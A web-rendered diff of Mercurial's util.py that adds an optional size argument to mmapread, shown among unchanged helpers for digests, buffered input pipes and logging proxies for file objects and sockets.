##// END OF EJS Templates
mmap: add a size argument to mmapread...
marmoute -
r44487:8ed8dfbe default
parent child Browse files
Show More
@@ -1,3611 +1,3617 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import attr
38 38 from .pycompat import (
39 39 delattr,
40 40 getattr,
41 41 open,
42 42 setattr,
43 43 )
44 44 from hgdemandimport import tracing
45 45 from . import (
46 46 encoding,
47 47 error,
48 48 i18n,
49 49 node as nodemod,
50 50 policy,
51 51 pycompat,
52 52 urllibcompat,
53 53 )
54 54 from .utils import (
55 55 compression,
56 56 procutil,
57 57 stringutil,
58 58 )
59 59
60 60 base85 = policy.importmod('base85')
61 61 osutil = policy.importmod('osutil')
62 62
63 63 b85decode = base85.b85decode
64 64 b85encode = base85.b85encode
65 65
66 66 cookielib = pycompat.cookielib
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 safehasattr = pycompat.safehasattr
70 70 socketserver = pycompat.socketserver
71 71 bytesio = pycompat.bytesio
72 72 # TODO deprecate stringio name, as it is a lie on Python 3.
73 73 stringio = bytesio
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 httpserver = urllibcompat.httpserver
77 77 urlerr = urllibcompat.urlerr
78 78 urlreq = urllibcompat.urlreq
79 79
80 80 # workaround for win32mbcs
81 81 _filenamebytestr = pycompat.bytestr
82 82
83 83 if pycompat.iswindows:
84 84 from . import windows as platform
85 85 else:
86 86 from . import posix as platform
87 87
88 88 _ = i18n._
89 89
90 90 bindunixsocket = platform.bindunixsocket
91 91 cachestat = platform.cachestat
92 92 checkexec = platform.checkexec
93 93 checklink = platform.checklink
94 94 copymode = platform.copymode
95 95 expandglobs = platform.expandglobs
96 96 getfsmountpoint = platform.getfsmountpoint
97 97 getfstype = platform.getfstype
98 98 groupmembers = platform.groupmembers
99 99 groupname = platform.groupname
100 100 isexec = platform.isexec
101 101 isowner = platform.isowner
102 102 listdir = osutil.listdir
103 103 localpath = platform.localpath
104 104 lookupreg = platform.lookupreg
105 105 makedir = platform.makedir
106 106 nlinks = platform.nlinks
107 107 normpath = platform.normpath
108 108 normcase = platform.normcase
109 109 normcasespec = platform.normcasespec
110 110 normcasefallback = platform.normcasefallback
111 111 openhardlinks = platform.openhardlinks
112 112 oslink = platform.oslink
113 113 parsepatchoutput = platform.parsepatchoutput
114 114 pconvert = platform.pconvert
115 115 poll = platform.poll
116 116 posixfile = platform.posixfile
117 117 readlink = platform.readlink
118 118 rename = platform.rename
119 119 removedirs = platform.removedirs
120 120 samedevice = platform.samedevice
121 121 samefile = platform.samefile
122 122 samestat = platform.samestat
123 123 setflags = platform.setflags
124 124 split = platform.split
125 125 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
126 126 statisexec = platform.statisexec
127 127 statislink = platform.statislink
128 128 umask = platform.umask
129 129 unlink = platform.unlink
130 130 username = platform.username
131 131
132 132 # small compat layer
133 133 compengines = compression.compengines
134 134 SERVERROLE = compression.SERVERROLE
135 135 CLIENTROLE = compression.CLIENTROLE
136 136
137 137 try:
138 138 recvfds = osutil.recvfds
139 139 except AttributeError:
140 140 pass
141 141
142 142 # Python compatibility
143 143
144 144 _notset = object()
145 145
146 146
147 147 def bitsfrom(container):
148 148 bits = 0
149 149 for bit in container:
150 150 bits |= bit
151 151 return bits
152 152
153 153
154 154 # python 2.6 still have deprecation warning enabled by default. We do not want
155 155 # to display anything to standard user so detect if we are running test and
156 156 # only use python deprecation warning in this case.
157 157 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
158 158 if _dowarn:
159 159 # explicitly unfilter our warning for python 2.7
160 160 #
161 161 # The option of setting PYTHONWARNINGS in the test runner was investigated.
162 162 # However, module name set through PYTHONWARNINGS was exactly matched, so
163 163 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
164 164 # makes the whole PYTHONWARNINGS thing useless for our usecase.
165 165 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
166 166 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
167 167 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
168 168 if _dowarn and pycompat.ispy3:
169 169 # silence warning emitted by passing user string to re.sub()
170 170 warnings.filterwarnings(
171 171 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
172 172 )
173 173 warnings.filterwarnings(
174 174 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
175 175 )
176 176 # TODO: reinvent imp.is_frozen()
177 177 warnings.filterwarnings(
178 178 'ignore',
179 179 'the imp module is deprecated',
180 180 DeprecationWarning,
181 181 'mercurial',
182 182 )
183 183
184 184
185 185 def nouideprecwarn(msg, version, stacklevel=1):
186 186 """Issue an python native deprecation warning
187 187
188 188 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
189 189 """
190 190 if _dowarn:
191 191 msg += (
192 192 b"\n(compatibility will be dropped after Mercurial-%s,"
193 193 b" update your code.)"
194 194 ) % version
195 195 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
196 196
197 197
198 198 DIGESTS = {
199 199 b'md5': hashlib.md5,
200 200 b'sha1': hashlib.sha1,
201 201 b'sha512': hashlib.sha512,
202 202 }
203 203 # List of digest types from strongest to weakest
204 204 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
205 205
206 206 for k in DIGESTS_BY_STRENGTH:
207 207 assert k in DIGESTS
208 208
209 209
210 210 class digester(object):
211 211 """helper to compute digests.
212 212
213 213 This helper can be used to compute one or more digests given their name.
214 214
215 215 >>> d = digester([b'md5', b'sha1'])
216 216 >>> d.update(b'foo')
217 217 >>> [k for k in sorted(d)]
218 218 ['md5', 'sha1']
219 219 >>> d[b'md5']
220 220 'acbd18db4cc2f85cedef654fccc4a4d8'
221 221 >>> d[b'sha1']
222 222 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
223 223 >>> digester.preferred([b'md5', b'sha1'])
224 224 'sha1'
225 225 """
226 226
227 227 def __init__(self, digests, s=b''):
228 228 self._hashes = {}
229 229 for k in digests:
230 230 if k not in DIGESTS:
231 231 raise error.Abort(_(b'unknown digest type: %s') % k)
232 232 self._hashes[k] = DIGESTS[k]()
233 233 if s:
234 234 self.update(s)
235 235
236 236 def update(self, data):
237 237 for h in self._hashes.values():
238 238 h.update(data)
239 239
240 240 def __getitem__(self, key):
241 241 if key not in DIGESTS:
242 242 raise error.Abort(_(b'unknown digest type: %s') % k)
243 243 return nodemod.hex(self._hashes[key].digest())
244 244
245 245 def __iter__(self):
246 246 return iter(self._hashes)
247 247
248 248 @staticmethod
249 249 def preferred(supported):
250 250 """returns the strongest digest type in both supported and DIGESTS."""
251 251
252 252 for k in DIGESTS_BY_STRENGTH:
253 253 if k in supported:
254 254 return k
255 255 return None
256 256
257 257
258 258 class digestchecker(object):
259 259 """file handle wrapper that additionally checks content against a given
260 260 size and digests.
261 261
262 262 d = digestchecker(fh, size, {'md5': '...'})
263 263
264 264 When multiple digests are given, all of them are validated.
265 265 """
266 266
267 267 def __init__(self, fh, size, digests):
268 268 self._fh = fh
269 269 self._size = size
270 270 self._got = 0
271 271 self._digests = dict(digests)
272 272 self._digester = digester(self._digests.keys())
273 273
274 274 def read(self, length=-1):
275 275 content = self._fh.read(length)
276 276 self._digester.update(content)
277 277 self._got += len(content)
278 278 return content
279 279
280 280 def validate(self):
281 281 if self._size != self._got:
282 282 raise error.Abort(
283 283 _(b'size mismatch: expected %d, got %d')
284 284 % (self._size, self._got)
285 285 )
286 286 for k, v in self._digests.items():
287 287 if v != self._digester[k]:
288 288 # i18n: first parameter is a digest name
289 289 raise error.Abort(
290 290 _(b'%s mismatch: expected %s, got %s')
291 291 % (k, v, self._digester[k])
292 292 )
293 293
294 294
295 295 try:
296 296 buffer = buffer
297 297 except NameError:
298 298
299 299 def buffer(sliceable, offset=0, length=None):
300 300 if length is not None:
301 301 return memoryview(sliceable)[offset : offset + length]
302 302 return memoryview(sliceable)[offset:]
303 303
304 304
305 305 _chunksize = 4096
306 306
307 307
308 308 class bufferedinputpipe(object):
309 309 """a manually buffered input pipe
310 310
311 311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 312 the same time. We cannot probe the buffer state and select will not detect
313 313 that data are ready to read if they are already buffered.
314 314
315 315 This class let us work around that by implementing its own buffering
316 316 (allowing efficient readline) while offering a way to know if the buffer is
317 317 empty from the output (allowing collaboration of the buffer with polling).
318 318
319 319 This class lives in the 'util' module because it makes use of the 'os'
320 320 module from the python stdlib.
321 321 """
322 322
323 323 def __new__(cls, fh):
324 324 # If we receive a fileobjectproxy, we need to use a variation of this
325 325 # class that notifies observers about activity.
326 326 if isinstance(fh, fileobjectproxy):
327 327 cls = observedbufferedinputpipe
328 328
329 329 return super(bufferedinputpipe, cls).__new__(cls)
330 330
331 331 def __init__(self, input):
332 332 self._input = input
333 333 self._buffer = []
334 334 self._eof = False
335 335 self._lenbuf = 0
336 336
337 337 @property
338 338 def hasbuffer(self):
339 339 """True is any data is currently buffered
340 340
341 341 This will be used externally a pre-step for polling IO. If there is
342 342 already data then no polling should be set in place."""
343 343 return bool(self._buffer)
344 344
345 345 @property
346 346 def closed(self):
347 347 return self._input.closed
348 348
349 349 def fileno(self):
350 350 return self._input.fileno()
351 351
352 352 def close(self):
353 353 return self._input.close()
354 354
355 355 def read(self, size):
356 356 while (not self._eof) and (self._lenbuf < size):
357 357 self._fillbuffer()
358 358 return self._frombuffer(size)
359 359
360 360 def unbufferedread(self, size):
361 361 if not self._eof and self._lenbuf == 0:
362 362 self._fillbuffer(max(size, _chunksize))
363 363 return self._frombuffer(min(self._lenbuf, size))
364 364
365 365 def readline(self, *args, **kwargs):
366 366 if len(self._buffer) > 1:
367 367 # this should not happen because both read and readline end with a
368 368 # _frombuffer call that collapse it.
369 369 self._buffer = [b''.join(self._buffer)]
370 370 self._lenbuf = len(self._buffer[0])
371 371 lfi = -1
372 372 if self._buffer:
373 373 lfi = self._buffer[-1].find(b'\n')
374 374 while (not self._eof) and lfi < 0:
375 375 self._fillbuffer()
376 376 if self._buffer:
377 377 lfi = self._buffer[-1].find(b'\n')
378 378 size = lfi + 1
379 379 if lfi < 0: # end of file
380 380 size = self._lenbuf
381 381 elif len(self._buffer) > 1:
382 382 # we need to take previous chunks into account
383 383 size += self._lenbuf - len(self._buffer[-1])
384 384 return self._frombuffer(size)
385 385
386 386 def _frombuffer(self, size):
387 387 """return at most 'size' data from the buffer
388 388
389 389 The data are removed from the buffer."""
390 390 if size == 0 or not self._buffer:
391 391 return b''
392 392 buf = self._buffer[0]
393 393 if len(self._buffer) > 1:
394 394 buf = b''.join(self._buffer)
395 395
396 396 data = buf[:size]
397 397 buf = buf[len(data) :]
398 398 if buf:
399 399 self._buffer = [buf]
400 400 self._lenbuf = len(buf)
401 401 else:
402 402 self._buffer = []
403 403 self._lenbuf = 0
404 404 return data
405 405
406 406 def _fillbuffer(self, size=_chunksize):
407 407 """read data to the buffer"""
408 408 data = os.read(self._input.fileno(), size)
409 409 if not data:
410 410 self._eof = True
411 411 else:
412 412 self._lenbuf += len(data)
413 413 self._buffer.append(data)
414 414
415 415 return data
416 416
417 417
418 def mmapread(fp):
418 def mmapread(fp, size=None):
419 if size == 0:
420 # size of 0 to mmap.mmap() means "all data"
421 # rather than "zero bytes", so special case that.
422 return b''
423 elif size is None:
424 size = 0
419 425 try:
420 426 fd = getattr(fp, 'fileno', lambda: fp)()
421 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
427 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
422 428 except ValueError:
423 429 # Empty files cannot be mmapped, but mmapread should still work. Check
424 430 # if the file is empty, and if so, return an empty buffer.
425 431 if os.fstat(fd).st_size == 0:
426 432 return b''
427 433 raise
428 434
429 435
430 436 class fileobjectproxy(object):
431 437 """A proxy around file objects that tells a watcher when events occur.
432 438
433 439 This type is intended to only be used for testing purposes. Think hard
434 440 before using it in important code.
435 441 """
436 442
437 443 __slots__ = (
438 444 '_orig',
439 445 '_observer',
440 446 )
441 447
442 448 def __init__(self, fh, observer):
443 449 object.__setattr__(self, '_orig', fh)
444 450 object.__setattr__(self, '_observer', observer)
445 451
446 452 def __getattribute__(self, name):
447 453 ours = {
448 454 '_observer',
449 455 # IOBase
450 456 'close',
451 457 # closed if a property
452 458 'fileno',
453 459 'flush',
454 460 'isatty',
455 461 'readable',
456 462 'readline',
457 463 'readlines',
458 464 'seek',
459 465 'seekable',
460 466 'tell',
461 467 'truncate',
462 468 'writable',
463 469 'writelines',
464 470 # RawIOBase
465 471 'read',
466 472 'readall',
467 473 'readinto',
468 474 'write',
469 475 # BufferedIOBase
470 476 # raw is a property
471 477 'detach',
472 478 # read defined above
473 479 'read1',
474 480 # readinto defined above
475 481 # write defined above
476 482 }
477 483
478 484 # We only observe some methods.
479 485 if name in ours:
480 486 return object.__getattribute__(self, name)
481 487
482 488 return getattr(object.__getattribute__(self, '_orig'), name)
483 489
484 490 def __nonzero__(self):
485 491 return bool(object.__getattribute__(self, '_orig'))
486 492
487 493 __bool__ = __nonzero__
488 494
489 495 def __delattr__(self, name):
490 496 return delattr(object.__getattribute__(self, '_orig'), name)
491 497
492 498 def __setattr__(self, name, value):
493 499 return setattr(object.__getattribute__(self, '_orig'), name, value)
494 500
495 501 def __iter__(self):
496 502 return object.__getattribute__(self, '_orig').__iter__()
497 503
498 504 def _observedcall(self, name, *args, **kwargs):
499 505 # Call the original object.
500 506 orig = object.__getattribute__(self, '_orig')
501 507 res = getattr(orig, name)(*args, **kwargs)
502 508
503 509 # Call a method on the observer of the same name with arguments
504 510 # so it can react, log, etc.
505 511 observer = object.__getattribute__(self, '_observer')
506 512 fn = getattr(observer, name, None)
507 513 if fn:
508 514 fn(res, *args, **kwargs)
509 515
510 516 return res
511 517
512 518 def close(self, *args, **kwargs):
513 519 return object.__getattribute__(self, '_observedcall')(
514 520 'close', *args, **kwargs
515 521 )
516 522
517 523 def fileno(self, *args, **kwargs):
518 524 return object.__getattribute__(self, '_observedcall')(
519 525 'fileno', *args, **kwargs
520 526 )
521 527
522 528 def flush(self, *args, **kwargs):
523 529 return object.__getattribute__(self, '_observedcall')(
524 530 'flush', *args, **kwargs
525 531 )
526 532
527 533 def isatty(self, *args, **kwargs):
528 534 return object.__getattribute__(self, '_observedcall')(
529 535 'isatty', *args, **kwargs
530 536 )
531 537
532 538 def readable(self, *args, **kwargs):
533 539 return object.__getattribute__(self, '_observedcall')(
534 540 'readable', *args, **kwargs
535 541 )
536 542
537 543 def readline(self, *args, **kwargs):
538 544 return object.__getattribute__(self, '_observedcall')(
539 545 'readline', *args, **kwargs
540 546 )
541 547
542 548 def readlines(self, *args, **kwargs):
543 549 return object.__getattribute__(self, '_observedcall')(
544 550 'readlines', *args, **kwargs
545 551 )
546 552
547 553 def seek(self, *args, **kwargs):
548 554 return object.__getattribute__(self, '_observedcall')(
549 555 'seek', *args, **kwargs
550 556 )
551 557
552 558 def seekable(self, *args, **kwargs):
553 559 return object.__getattribute__(self, '_observedcall')(
554 560 'seekable', *args, **kwargs
555 561 )
556 562
557 563 def tell(self, *args, **kwargs):
558 564 return object.__getattribute__(self, '_observedcall')(
559 565 'tell', *args, **kwargs
560 566 )
561 567
562 568 def truncate(self, *args, **kwargs):
563 569 return object.__getattribute__(self, '_observedcall')(
564 570 'truncate', *args, **kwargs
565 571 )
566 572
567 573 def writable(self, *args, **kwargs):
568 574 return object.__getattribute__(self, '_observedcall')(
569 575 'writable', *args, **kwargs
570 576 )
571 577
572 578 def writelines(self, *args, **kwargs):
573 579 return object.__getattribute__(self, '_observedcall')(
574 580 'writelines', *args, **kwargs
575 581 )
576 582
577 583 def read(self, *args, **kwargs):
578 584 return object.__getattribute__(self, '_observedcall')(
579 585 'read', *args, **kwargs
580 586 )
581 587
582 588 def readall(self, *args, **kwargs):
583 589 return object.__getattribute__(self, '_observedcall')(
584 590 'readall', *args, **kwargs
585 591 )
586 592
587 593 def readinto(self, *args, **kwargs):
588 594 return object.__getattribute__(self, '_observedcall')(
589 595 'readinto', *args, **kwargs
590 596 )
591 597
592 598 def write(self, *args, **kwargs):
593 599 return object.__getattribute__(self, '_observedcall')(
594 600 'write', *args, **kwargs
595 601 )
596 602
597 603 def detach(self, *args, **kwargs):
598 604 return object.__getattribute__(self, '_observedcall')(
599 605 'detach', *args, **kwargs
600 606 )
601 607
602 608 def read1(self, *args, **kwargs):
603 609 return object.__getattribute__(self, '_observedcall')(
604 610 'read1', *args, **kwargs
605 611 )
606 612
607 613
608 614 class observedbufferedinputpipe(bufferedinputpipe):
609 615 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
610 616
611 617 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
612 618 bypass ``fileobjectproxy``. Because of this, we need to make
613 619 ``bufferedinputpipe`` aware of these operations.
614 620
615 621 This variation of ``bufferedinputpipe`` can notify observers about
616 622 ``os.read()`` events. It also re-publishes other events, such as
617 623 ``read()`` and ``readline()``.
618 624 """
619 625
620 626 def _fillbuffer(self):
621 627 res = super(observedbufferedinputpipe, self)._fillbuffer()
622 628
623 629 fn = getattr(self._input._observer, 'osread', None)
624 630 if fn:
625 631 fn(res, _chunksize)
626 632
627 633 return res
628 634
629 635 # We use different observer methods because the operation isn't
630 636 # performed on the actual file object but on us.
631 637 def read(self, size):
632 638 res = super(observedbufferedinputpipe, self).read(size)
633 639
634 640 fn = getattr(self._input._observer, 'bufferedread', None)
635 641 if fn:
636 642 fn(res, size)
637 643
638 644 return res
639 645
640 646 def readline(self, *args, **kwargs):
641 647 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
642 648
643 649 fn = getattr(self._input._observer, 'bufferedreadline', None)
644 650 if fn:
645 651 fn(res)
646 652
647 653 return res
648 654
649 655
650 656 PROXIED_SOCKET_METHODS = {
651 657 'makefile',
652 658 'recv',
653 659 'recvfrom',
654 660 'recvfrom_into',
655 661 'recv_into',
656 662 'send',
657 663 'sendall',
658 664 'sendto',
659 665 'setblocking',
660 666 'settimeout',
661 667 'gettimeout',
662 668 'setsockopt',
663 669 }
664 670
665 671
666 672 class socketproxy(object):
667 673 """A proxy around a socket that tells a watcher when events occur.
668 674
669 675 This is like ``fileobjectproxy`` except for sockets.
670 676
671 677 This type is intended to only be used for testing purposes. Think hard
672 678 before using it in important code.
673 679 """
674 680
675 681 __slots__ = (
676 682 '_orig',
677 683 '_observer',
678 684 )
679 685
680 686 def __init__(self, sock, observer):
681 687 object.__setattr__(self, '_orig', sock)
682 688 object.__setattr__(self, '_observer', observer)
683 689
684 690 def __getattribute__(self, name):
685 691 if name in PROXIED_SOCKET_METHODS:
686 692 return object.__getattribute__(self, name)
687 693
688 694 return getattr(object.__getattribute__(self, '_orig'), name)
689 695
690 696 def __delattr__(self, name):
691 697 return delattr(object.__getattribute__(self, '_orig'), name)
692 698
693 699 def __setattr__(self, name, value):
694 700 return setattr(object.__getattribute__(self, '_orig'), name, value)
695 701
696 702 def __nonzero__(self):
697 703 return bool(object.__getattribute__(self, '_orig'))
698 704
699 705 __bool__ = __nonzero__
700 706
701 707 def _observedcall(self, name, *args, **kwargs):
702 708 # Call the original object.
703 709 orig = object.__getattribute__(self, '_orig')
704 710 res = getattr(orig, name)(*args, **kwargs)
705 711
706 712 # Call a method on the observer of the same name with arguments
707 713 # so it can react, log, etc.
708 714 observer = object.__getattribute__(self, '_observer')
709 715 fn = getattr(observer, name, None)
710 716 if fn:
711 717 fn(res, *args, **kwargs)
712 718
713 719 return res
714 720
715 721 def makefile(self, *args, **kwargs):
716 722 res = object.__getattribute__(self, '_observedcall')(
717 723 'makefile', *args, **kwargs
718 724 )
719 725
720 726 # The file object may be used for I/O. So we turn it into a
721 727 # proxy using our observer.
722 728 observer = object.__getattribute__(self, '_observer')
723 729 return makeloggingfileobject(
724 730 observer.fh,
725 731 res,
726 732 observer.name,
727 733 reads=observer.reads,
728 734 writes=observer.writes,
729 735 logdata=observer.logdata,
730 736 logdataapis=observer.logdataapis,
731 737 )
732 738
733 739 def recv(self, *args, **kwargs):
734 740 return object.__getattribute__(self, '_observedcall')(
735 741 'recv', *args, **kwargs
736 742 )
737 743
738 744 def recvfrom(self, *args, **kwargs):
739 745 return object.__getattribute__(self, '_observedcall')(
740 746 'recvfrom', *args, **kwargs
741 747 )
742 748
743 749 def recvfrom_into(self, *args, **kwargs):
744 750 return object.__getattribute__(self, '_observedcall')(
745 751 'recvfrom_into', *args, **kwargs
746 752 )
747 753
748 754 def recv_into(self, *args, **kwargs):
749 755 return object.__getattribute__(self, '_observedcall')(
750 756 'recv_info', *args, **kwargs
751 757 )
752 758
753 759 def send(self, *args, **kwargs):
754 760 return object.__getattribute__(self, '_observedcall')(
755 761 'send', *args, **kwargs
756 762 )
757 763
758 764 def sendall(self, *args, **kwargs):
759 765 return object.__getattribute__(self, '_observedcall')(
760 766 'sendall', *args, **kwargs
761 767 )
762 768
763 769 def sendto(self, *args, **kwargs):
764 770 return object.__getattribute__(self, '_observedcall')(
765 771 'sendto', *args, **kwargs
766 772 )
767 773
768 774 def setblocking(self, *args, **kwargs):
769 775 return object.__getattribute__(self, '_observedcall')(
770 776 'setblocking', *args, **kwargs
771 777 )
772 778
773 779 def settimeout(self, *args, **kwargs):
774 780 return object.__getattribute__(self, '_observedcall')(
775 781 'settimeout', *args, **kwargs
776 782 )
777 783
778 784 def gettimeout(self, *args, **kwargs):
779 785 return object.__getattribute__(self, '_observedcall')(
780 786 'gettimeout', *args, **kwargs
781 787 )
782 788
783 789 def setsockopt(self, *args, **kwargs):
784 790 return object.__getattribute__(self, '_observedcall')(
785 791 'setsockopt', *args, **kwargs
786 792 )
787 793
788 794
789 795 class baseproxyobserver(object):
790 796 def __init__(self, fh, name, logdata, logdataapis):
791 797 self.fh = fh
792 798 self.name = name
793 799 self.logdata = logdata
794 800 self.logdataapis = logdataapis
795 801
796 802 def _writedata(self, data):
797 803 if not self.logdata:
798 804 if self.logdataapis:
799 805 self.fh.write(b'\n')
800 806 self.fh.flush()
801 807 return
802 808
803 809 # Simple case writes all data on a single line.
804 810 if b'\n' not in data:
805 811 if self.logdataapis:
806 812 self.fh.write(b': %s\n' % stringutil.escapestr(data))
807 813 else:
808 814 self.fh.write(
809 815 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
810 816 )
811 817 self.fh.flush()
812 818 return
813 819
814 820 # Data with newlines is written to multiple lines.
815 821 if self.logdataapis:
816 822 self.fh.write(b':\n')
817 823
818 824 lines = data.splitlines(True)
819 825 for line in lines:
820 826 self.fh.write(
821 827 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
822 828 )
823 829 self.fh.flush()
824 830
825 831
826 832 class fileobjectobserver(baseproxyobserver):
827 833 """Logs file object activity."""
828 834
829 835 def __init__(
830 836 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
831 837 ):
832 838 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
833 839 self.reads = reads
834 840 self.writes = writes
835 841
836 842 def read(self, res, size=-1):
837 843 if not self.reads:
838 844 return
839 845 # Python 3 can return None from reads at EOF instead of empty strings.
840 846 if res is None:
841 847 res = b''
842 848
843 849 if size == -1 and res == b'':
844 850 # Suppress pointless read(-1) calls that return
845 851 # nothing. These happen _a lot_ on Python 3, and there
846 852 # doesn't seem to be a better workaround to have matching
847 853 # Python 2 and 3 behavior. :(
848 854 return
849 855
850 856 if self.logdataapis:
851 857 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
852 858
853 859 self._writedata(res)
854 860
855 861 def readline(self, res, limit=-1):
856 862 if not self.reads:
857 863 return
858 864
859 865 if self.logdataapis:
860 866 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
861 867
862 868 self._writedata(res)
863 869
864 870 def readinto(self, res, dest):
865 871 if not self.reads:
866 872 return
867 873
868 874 if self.logdataapis:
869 875 self.fh.write(
870 876 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
871 877 )
872 878
873 879 data = dest[0:res] if res is not None else b''
874 880
875 881 # _writedata() uses "in" operator and is confused by memoryview because
876 882 # characters are ints on Python 3.
877 883 if isinstance(data, memoryview):
878 884 data = data.tobytes()
879 885
880 886 self._writedata(data)
881 887
882 888 def write(self, res, data):
883 889 if not self.writes:
884 890 return
885 891
886 892 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 893 # returns the integer bytes written.
888 894 if res is None and data:
889 895 res = len(data)
890 896
891 897 if self.logdataapis:
892 898 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
893 899
894 900 self._writedata(data)
895 901
896 902 def flush(self, res):
897 903 if not self.writes:
898 904 return
899 905
900 906 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
901 907
902 908 # For observedbufferedinputpipe.
903 909 def bufferedread(self, res, size):
904 910 if not self.reads:
905 911 return
906 912
907 913 if self.logdataapis:
908 914 self.fh.write(
909 915 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
910 916 )
911 917
912 918 self._writedata(res)
913 919
914 920 def bufferedreadline(self, res):
915 921 if not self.reads:
916 922 return
917 923
918 924 if self.logdataapis:
919 925 self.fh.write(
920 926 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
921 927 )
922 928
923 929 self._writedata(res)
924 930
925 931
926 932 def makeloggingfileobject(
927 933 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
928 934 ):
929 935 """Turn a file object into a logging file object."""
930 936
931 937 observer = fileobjectobserver(
932 938 logh,
933 939 name,
934 940 reads=reads,
935 941 writes=writes,
936 942 logdata=logdata,
937 943 logdataapis=logdataapis,
938 944 )
939 945 return fileobjectproxy(fh, observer)
940 946
941 947
942 948 class socketobserver(baseproxyobserver):
943 949 """Logs socket activity."""
944 950
945 951 def __init__(
946 952 self,
947 953 fh,
948 954 name,
949 955 reads=True,
950 956 writes=True,
951 957 states=True,
952 958 logdata=False,
953 959 logdataapis=True,
954 960 ):
955 961 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
956 962 self.reads = reads
957 963 self.writes = writes
958 964 self.states = states
959 965
960 966 def makefile(self, res, mode=None, bufsize=None):
961 967 if not self.states:
962 968 return
963 969
964 970 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
965 971
966 972 def recv(self, res, size, flags=0):
967 973 if not self.reads:
968 974 return
969 975
970 976 if self.logdataapis:
971 977 self.fh.write(
972 978 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
973 979 )
974 980 self._writedata(res)
975 981
976 982 def recvfrom(self, res, size, flags=0):
977 983 if not self.reads:
978 984 return
979 985
980 986 if self.logdataapis:
981 987 self.fh.write(
982 988 b'%s> recvfrom(%d, %d) -> %d'
983 989 % (self.name, size, flags, len(res[0]))
984 990 )
985 991
986 992 self._writedata(res[0])
987 993
988 994 def recvfrom_into(self, res, buf, size, flags=0):
989 995 if not self.reads:
990 996 return
991 997
992 998 if self.logdataapis:
993 999 self.fh.write(
994 1000 b'%s> recvfrom_into(%d, %d) -> %d'
995 1001 % (self.name, size, flags, res[0])
996 1002 )
997 1003
998 1004 self._writedata(buf[0 : res[0]])
999 1005
1000 1006 def recv_into(self, res, buf, size=0, flags=0):
1001 1007 if not self.reads:
1002 1008 return
1003 1009
1004 1010 if self.logdataapis:
1005 1011 self.fh.write(
1006 1012 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1007 1013 )
1008 1014
1009 1015 self._writedata(buf[0:res])
1010 1016
1011 1017 def send(self, res, data, flags=0):
1012 1018 if not self.writes:
1013 1019 return
1014 1020
1015 1021 self.fh.write(
1016 1022 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1017 1023 )
1018 1024 self._writedata(data)
1019 1025
1020 1026 def sendall(self, res, data, flags=0):
1021 1027 if not self.writes:
1022 1028 return
1023 1029
1024 1030 if self.logdataapis:
1025 1031 # Returns None on success. So don't bother reporting return value.
1026 1032 self.fh.write(
1027 1033 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1028 1034 )
1029 1035
1030 1036 self._writedata(data)
1031 1037
1032 1038 def sendto(self, res, data, flagsoraddress, address=None):
1033 1039 if not self.writes:
1034 1040 return
1035 1041
1036 1042 if address:
1037 1043 flags = flagsoraddress
1038 1044 else:
1039 1045 flags = 0
1040 1046
1041 1047 if self.logdataapis:
1042 1048 self.fh.write(
1043 1049 b'%s> sendto(%d, %d, %r) -> %d'
1044 1050 % (self.name, len(data), flags, address, res)
1045 1051 )
1046 1052
1047 1053 self._writedata(data)
1048 1054
1049 1055 def setblocking(self, res, flag):
1050 1056 if not self.states:
1051 1057 return
1052 1058
1053 1059 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1054 1060
1055 1061 def settimeout(self, res, value):
